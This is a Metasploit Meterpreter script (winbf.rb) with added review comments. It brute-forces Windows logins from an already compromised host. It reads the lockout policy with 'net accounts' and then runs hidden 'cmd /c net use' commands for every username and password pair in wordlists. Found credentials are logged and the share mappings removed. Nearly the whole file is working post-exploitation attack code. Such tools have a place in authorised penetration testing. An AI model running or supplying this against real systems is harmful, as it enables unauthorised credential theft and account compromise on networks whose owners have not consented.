Path: blob/master/scripts/meterpreter/winbf.rb
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##


# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
# winbf: Windows login brute force driven from an existing Meterpreter session.
# Every candidate credential is tested by running `cmd /c net use \\<target> ...`
# on the compromised host (see passbf), so each guess is a separate
# authentication attempt against `target` plus a new cmd.exe process on the
# host - both are noisy. chkpolicy exists because a configured lockout
# threshold turns repeated guesses into a lockout of the targeted accounts.
################## Variable Declarations ##################
# Option table: flag => [takes_value, description]. Held in a class variable
# (@@) at script top level; a plain local would serve the same purpose here.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "\tHelp menu."],
  "-t" => [ true, "\tTarget IP Address"],
  "-p" => [ true, "\tPassword List"],
  "-c" => [ false, "\tCheck Local Machine Password Policy"],
  "-L" => [ true, "\tUsername List to be brute forced"],
  "-l" => [ true, "\tLogin name to be brute forced"]
)
# Variables for Options
user = []       # login names collected from -l (Array of String)
ulopt = nil     # 0 => `user` holds names; 1 => `userlist` is a path to a file of names
userlist = nil  # path given with -L
passlist = nil  # path given with -p (existence is checked while parsing)
target = nil    # host given with -t; used verbatim in the command line and the log filename
helpcall = 0    # set to 1 once -h has printed usage, suppresses the usage dump at the end

# The 'client' object holds the Meterpreter session
# Aliasing here for plugin compatibility
session = client

################## Function Definition ##################
# Function for checking the password policy of current system.
# This policy may resemble the policy of other servers in the
# target environment.
#
# Runs `net accounts` on the compromised host through the session and reports
# the lockout threshold, observation window, lockout duration and minimum
# password length found in its output.
#
# @param session [Object] Meterpreter client; must expose sys.process.execute
# @return [nil] results are reported with print_status only
#
# NOTE(review): String#scan with a capture group returns an Array of Arrays
# (e.g. [["5"]]); that nested form is what is interpolated into the messages
# below, and `minpass.to_s == "0"` compares against something like `[["0"]]`,
# so the "No minimum password length" branch looks unreachable - confirm
# before trusting this report.
def chkpolicy(session)
  print_status("Checking password policy...")
  output = []  # raw channel chunks; output.to_s (the Array inspect form) is what the regexes scan
  begin
    # Hidden + Channelized: no window on the host, process stdout is readable via r.channel
    r = session.sys.process.execute("net accounts", nil, {'Hidden' => true, 'Channelized' => true})
    while(d = r.channel.read)
      output << d
    end
    r.channel.close
    r.close
    # Parsing output of net accounts
    lockout = output.to_s.scan(/Lockout\sthreshold:\s*(\d*)/)
    minpass = output.to_s.scan(/Minimum\spassword\slength:\s*(\d*)/)
    failcount = output.to_s.scan(/Lockout\sobservation\swindow\s\(minutes\)\:\s*(\d*)/)
    lcktime = output.to_s.scan(/Lockout\sduration\s\(minutes\)\:\s*(\d*)/)
    # check for account lockout
    if lockout.empty?
      print_status "\tNo account lockout threshold configured"
    else
      print_status "\tWARNING Lockout threshold configured, if #{lockout} attempts in #{failcount} minutes account will be locked"
      print_status "\tThe account will be locked out for #{lcktime}"
    end
    # check for password length
    if minpass.to_s == "0"
      print_status "\tNo minimum password length is configured"
    else
      print_status "\tThe minimum password length configured is #{minpass}"
      print_status "\tyour dictionary should start with passwords of #{minpass} length"
    end
  rescue ::Exception => e
    # Rescuing ::Exception also swallows Interrupt/SystemExit; StandardError is the usual choice.
    print_status("The following Error was encountered: #{e.class} #{e}")
  end
end
#--------------------------------------------------------

# Function for brute forcing passwords using windows native tools
#
# For each user, walks `passlist` once and tries every line with
# `net use \\target <pass> /u:<user>` executed on the compromised host. A
# successful mapping is written to `logfile` and immediately removed again with
# `net use \\target /delete`, then the next user is tried.
#
# @param session  Meterpreter client
# @param passlist [String] path (local to the framework) of the password file
# @param target   [String] host placed unquoted in the command line
# @param user     [Array<String>, String] login names, or (when opt == 1) the path of a file of names
# @param opt      [Integer] 1 => `user` is a file path; anything else => `user` is an Array of names
# @param logfile  [String] path appended to with file_local_write on every hit
# @return [nil]
#
# NOTE(review): user and password are interpolated into a `cmd /c` line without
# quoting, so wordlist entries containing spaces or cmd metacharacters are not
# passed through intact. Neither File opened below is ever closed. `result`,
# `a` and `i` are assigned but `a` and `i` are never read.
def passbf(session,passlist,target,user,opt,logfile)
  print_status("Running Brute force attack against #{user}")
  print_status("Successful Username and Password pairs are being saved in #{logfile}")
  result = []
  output = []   # accumulates channel output across attempts; cleared only after a hit
  passfnd = 0   # 1 once the password file has been walked for the current user
  a = []
  i = 0
  if opt == 1
    if not ::File.exist?(user)
      raise "Usernames List File does not exist!"
    else
      user = ::File.open(user, "r")  # rebinds `user` to a File; File#each below yields lines
    end
  end
  # Go thru each user
  user.each do |u|
    # Go thru each line in the password file
    # passfnd is set to 1 after each_line finishes and reset to 0 for the next
    # user, so this `while` makes exactly one pass over the file per user; the
    # `break` further down only leaves each_line early once a password matched.
    while passfnd < 1
      ::File.open(passlist, "r").each_line do |line|
        begin
          print_status("Trying #{u.chomp} #{line.chomp}")

          # Command for testing local login credentials
          r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true})
          while(d = r.channel.read)
            output << d
          end
          r.channel.close
          r.close

          # Checks if password is found
          # (exactly one success string must be present in everything read so far)
          result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/)
          if result.length == 1
            print_status("\tUser: #{u.chomp} pass: #{line.chomp} found")
            file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}")
            # Drop the share mapping again so nothing stays connected from the host
            r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true})
            while(d = r.channel.read)
              output << d
            end
            output.clear
            r.channel.close
            r.close
            passfnd = 1
            break
          end
        rescue ::Exception => e
          # Rescuing ::Exception also swallows Interrupt/SystemExit; StandardError is the usual choice.
          print_status("The following Error was encountered: #{e.class} #{e}")
        end

      end
      passfnd = 1
    end
    passfnd = 0
  end
end

#--------------------------------------------------------
# Function for creating log file
#
# Builds the per-run log path `<msf log dir>/scripts/winbf/<target>_<timestamp>`
# and creates the directory. Only the path is returned; the file itself is
# written later by file_local_write in passbf.
#
# @param target [String] appended verbatim to the path
# @return [String] destination log path
#
# NOTE(review): the timestamp format is "%Y%m%d.%M%S" (minute.second, no hour);
# presumably "%H%M%S" was intended - confirm. `target` is joined into the path
# unsanitised, so a value containing path separators changes where the log lands.
def logme(target)

  # Create Filename info to be appended to files
  filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")

  # Create a directory for the logs
  logs = ::File.join(Msf::Config.log_directory,'scripts', 'winbf')

  # Create the log directory
  ::FileUtils.mkdir_p(logs)

  #logfile name
  dest = logs + "/" + target + filenameinfo

  dest
end
#--------------------------------------------------------
#
##check for proper Meterpreter Platform
# Prints an error and ends the script by raising Rex::Script::Completed.
def unsupported
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end
unsupported if client.platform != 'windows'

################## MAIN ##################

# Parsing of Options
# The block receives (flag, index, value); value is nil for flags declared `false` above.
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-l"
    user << val
    ulopt = 0
  when "-L"
    userlist = val
    ulopt = 1

  when "-c"
    chkpolicy(session)
    # Kernel#exit (SystemExit) here, unlike `unsupported` which raises Rex::Script::Completed
    exit
  when "-p"

    passlist = val
    if not ::File.exist?(passlist)
      raise "Password File does not exist!"
    end
  when "-t"
    target = val  # not validated
  when "-h"
    print("Windows Login Brute Force Meterpreter Script\n" +
      "Usage:\n" +
      @@exec_opts.usage)
    helpcall = 1
  end

}

# Execution of options selected
# -l names win over -L when both were given, but `ulopt` reflects whichever
# flag came last. logme(target) creates the log directory before passbf runs.
# With nothing usable selected and no -h, usage is printed.
if user.length > 0 && passlist != nil && target != nil

  passbf(session,passlist,target,user,ulopt,logme(target))

elsif userlist != nil && passlist != nil && target != nil

  passbf(session,passlist,target,userlist,ulopt,logme(target))

elsif helpcall == 0
  print("Windows Login Brute Force Meterpreter Script\n" +
    "Usage:\n" +
    @@exec_opts.usage)

end